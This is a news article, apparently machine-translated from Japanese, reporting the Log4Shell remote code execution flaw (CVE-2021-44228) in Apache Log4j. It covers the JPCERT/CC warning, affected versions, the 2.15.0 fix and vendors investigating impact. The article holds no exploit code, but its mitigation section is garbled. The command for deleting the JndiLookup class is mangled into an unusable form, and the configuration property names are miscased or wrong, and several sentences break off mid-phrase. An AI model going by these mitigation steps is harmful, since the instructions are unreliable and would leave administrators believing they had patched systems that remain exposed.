The Java log output library "Apache Log4J" reported a serious vulnerability (CVE-2021-44228) that could be remotely executed remotely.On December 11, the JPCERT Coordination Center (JPCERT/CC) urgently raised in Japan to confirm the attack on this vulnerability in Japan.
The vulnerability was reported on the 9th of the United States, by CHEN ZHAOJUN, Alibaba Cloud Security Team.LOG4J is implemented in many applications as a library outputting the Java application log.
According to JPCert/CC, the vulnerability is due to the LOOKUP in which the log string is replaced with a variable in Log4J.If the "JNDI LOOKUP" function contained in this is abused, a remotely crafted character string is transmitted and the Log4J is recorded as a log, so that LOG4J is designated by LOOKUP and from the internal path.Read and execute the Java Class file.It is said that any code will be executed.The version affected by the vulnerability is 2.0-Beta 9 to 2.14.1.
The concept demonstration (POC) code that exploits this vulnerability has already been released, and JPCert/CC has confirmed communication in Japan to attempt to abuse vulnerabilities.The vulnerability began to be called "Log4shell".According to the developer's Apache Software Foundation analysis, the largest value of the common vulnerability evaluation system (CVSS) is the largest "10.0".
Apache Software Foundation has released Log4J 2.15.0, which has revised this vulnerabilities, and is promoting early response to application developers.In the modified version, LOOKUP was disabled in the initial setting.In addition, as a method to alleviate the effects of vulnerabilities, in version 2.10 or later, specify "Log4j2.Formatmsgnolookups" as a system property, or change "Log4j_format_msg_lookups" from "TRUE" from 2.0-Beta 9.In the previous version, we will introduce the classpass "zip -q -d -d log4j -color -*jar org/apache/logging/log4j/core/lookup/jnDILOOKUP.CLASS".ing.
Cisco Systems, Amazon Web Services (AWS), Salesforce.com, VMware, IBM, Red Hat, Netapp, and ORACLE use LOG4J, which is affected by some products and services.The situation was announced.
Palo Alto Networks, SonicWall, Trend Micro, Pulse Secure, etc. are investigating the effects of vulnerabilities in products.